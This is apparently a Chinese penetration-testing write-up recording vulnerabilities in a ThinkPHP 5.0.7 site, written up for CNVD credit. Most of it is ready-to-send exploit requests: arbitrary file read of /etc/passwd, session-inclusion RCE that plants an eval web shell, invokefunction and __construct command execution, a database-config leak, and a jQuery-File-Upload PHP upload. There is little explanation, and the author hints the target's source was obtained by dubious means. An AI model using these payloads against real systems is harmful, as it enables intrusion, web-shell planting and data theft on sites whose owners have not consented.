框架漏洞(Thinkphp)
TP5框架漏洞原理不做赘述了 自行搜索。
瞅一眼源码 thinkphp_5.0.7 稳了,nday都会打吧(CNVD就是这么简单!但那你要问我源码哪里来的?当然是天上掉下来的)
thinkphp/base.php
TP5 任意文件读取 (CNVD+1)
url:
http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/\think\Lang/load&file=/etc/passwd
TP5 session文件包含RCE (CNVD+1)
数据包:
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyob
Content-Length: 113
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1
|
1
2
3
4
5
6
7
8
9
10
11
| POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyoq
Content-Length: 113
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_qyctu23kyhoawqnvt1xdhyyob&c=phpinfo();
|
TP5 invokefunction 命令执行(重复)
数据包:
1
2
3
4
5
6
7
| GET /public/index.php/admin/pub/login.html/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Cache-Control: no-cache
Pragma: no-cache
|
TP5 construct 命令执行(CNVD+1)
数据包:
1
2
3
4
5
6
7
8
9
10
| POST /public/index.php/admin/pub/login.html/index.php?s=index/index/index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 56
s=whoami&_method=__construct&method=POST&filter[]=system
|
TP5 信息泄露(CNVD+1)
url:
http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/think\config/get&name=database.username
组件漏洞
jQuery-File-Upload 任意文件上传(重复)
翻看源码发现jQuery-File-Upload组件
CVE-2018-9207
http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/
数据包:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| POST /public/static/admin/lib/jQuery-File-Upload/server/php/ HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURbQ6ukomAO4BxJo
User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/132.0.0.0Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: application/json,text/javascript,*/*;q=0.01
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 202
------WebKitFormBoundaryURbQ6ukomAO4BxJo
Content-Disposition: form-data;name="files[]";filename="cnvd.php"
Content-Type: text/php
<?php phpinfo(); ?>
------WebKitFormBoundaryURbQ6ukomAO4BxJo--
|
http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/server/php/files/cnvd.php
成果展示
此处为语雀卡片,点击链接查看